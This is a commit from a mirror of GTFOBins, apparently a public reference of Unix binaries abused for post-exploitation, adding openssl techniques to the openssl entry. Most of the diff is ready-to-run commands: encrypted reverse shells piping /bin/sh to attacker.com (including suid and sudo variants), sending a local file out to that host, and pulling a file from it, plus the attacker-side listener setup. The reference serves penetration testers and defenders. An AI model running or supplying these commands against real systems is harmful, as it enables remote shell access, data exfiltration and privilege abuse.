public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-12-25 22:40:10 +01:00
Code Issues Projects Releases Wiki Activity

Add reverse-shell, file-upload and file-download to openssl

Browse Source
This commit is contained in:
Andrea Cardaci 2019-03-06 14:10:25 +01:00
commit aef9c84b02
1 changed files with 61 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

64
_gtfobins/openssl.md
View File

@ -1,5 +1,43 @@
--- ---
functions: functions:
reverse-shell:
- description: |
To receive the shell run the following on the attacker box:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
Communication between attacker and target will be encrypted.
code: |
RHOST=attacker.com
RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
file-upload:
- description: |
To collect the file run the following on the attacker box:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save
Send a file to a TCP port, transmission will be encrypted.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT < "$LFILE"
file-download:
- description: |
To send the file run the following on the attacker box:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send
Fetch a file from a TCP port, transmission will be encrypted.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
@ -14,11 +52,31 @@ functions:
LFILE=file_to_read LFILE=file_to_read
openssl enc -in "$LFILE" openssl enc -in "$LFILE"
suid: suid:
- description: |
To receive the shell run the following on the attacker box:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
Communication between attacker and target will be encrypted.
code: |
RHOST=attacker.com
RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo DATA | openssl enc -out "$LFILE" echo DATA | openssl enc -out "$LFILE"
sudo: sudo:
- code: | - description: |
LFILE=file_to_write To receive the shell run the following on the attacker box:
echo DATA | sudo openssl enc -out "$LFILE"
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345
Communication between attacker and target will be encrypted.
code: |
RHOST=attacker.com
RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
--- ---